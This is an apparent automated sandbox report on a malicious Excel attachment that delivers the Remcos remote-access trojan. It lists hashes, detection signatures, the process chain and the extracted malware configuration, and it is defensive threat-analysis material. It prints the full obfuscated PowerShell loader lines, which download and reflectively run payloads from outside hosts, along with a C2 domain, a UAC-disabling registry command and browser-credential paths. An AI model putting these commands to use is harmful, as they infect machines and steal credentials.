

Windows Analysis Report
RFQ_0230909024SEPT.xla.xlsx

Overview

General Information

Sample name: RFQ_0230909024SEPT.xla.xlsx
Analysis ID: 1508122
MD5: 4845ee83a0c0be0e039c18c4d7720ee1
SHA1: 770f3d61acab0397fef8a398a1b9c4e3ad8b59ad
SHA256: 5d0bf961a7a1039d1ec84f5dc6705d922d6aea6ed935e2481d07e2428c743dc5
Tags: xlsx

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3236 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3504 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3588 cmdline: "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3612 cmdline: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3720 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepiowy3\sepiowy3.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3728 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE61B.tmp" "c:\Users\user\AppData\Local\Temp\sepiowy3\CSC80F6A6947D640689146C75DBBC3F89.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3808 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3852 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 3940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 4040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 4056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                • RegAsm.exe (PID: 4064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 816 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 2080 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qkhuvcdnqajhhwo" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3164 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3040 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\beufwmopeibmjckcxn" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 728 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 2556 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 2180 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\dyzxxfyisqtztqyghytih" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "camzeroconnect.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GT4655", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings
00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
Source | Rule | Description | Author | Strings
14.2.powershell.exe.12691f90.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
14.2.powershell.exe.12691f90.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
14.2.powershell.exe.12691f90.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
14.2.powershell.exe.12691f90.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x690b8:$a1: Remcos restarted by watchdog!
  • 0x69630:$a3: %02i:%02i:%02i:%03i
14.2.powershell.exe.12691f90.0.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x6310c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6317c:$str_b2: Executing file:
  • 0x641fc:$str_b3: GetDirectListeningPort
  • 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63d28:$str_b7: \update.vbs
  • 0x631a4:$str_b9: Downloaded file:
  • 0x63190:$str_b10: Downloading file:
  • 0x63234:$str_b12: Failed to upload file:
  • 0x641c4:$str_b13: StartForward
  • 0x641e4:$str_b14: StopForward
  • 0x63c80:$str_b15: fso.DeleteFile "
  • 0x63c14:$str_b16: On Error Resume Next
  • 0x63cb0:$str_b17: fso.DeleteFolder "
  • 0x63224:$str_b18: Uploaded file:
  • 0x631e4:$str_b19: Unable to delete:
  • 0x63c48:$str_b20: while fso.FileExists("
  • 0x636c1:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]'
Source: File created | Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3236, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetcateudpationprocess[1].hta
Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.RECSRN/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload removed]'
                Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , ProcessId: 3808, ProcessName: wscript.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? 
?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?T
                Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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
                Source: Process started | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io | Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3236, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3504, ProcessName: mshta.exe
                Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWErsHelL -eX BYpaSS -nOP -W 1 -C DEVIcecrEdENTiaLdePLOYmeNT.exe ; IEx($(IeX('[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'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'+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3612, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\pictureupdatedwithnewqualit.vbS" , ProcessId: 3808, ProcessName: wscript.exe
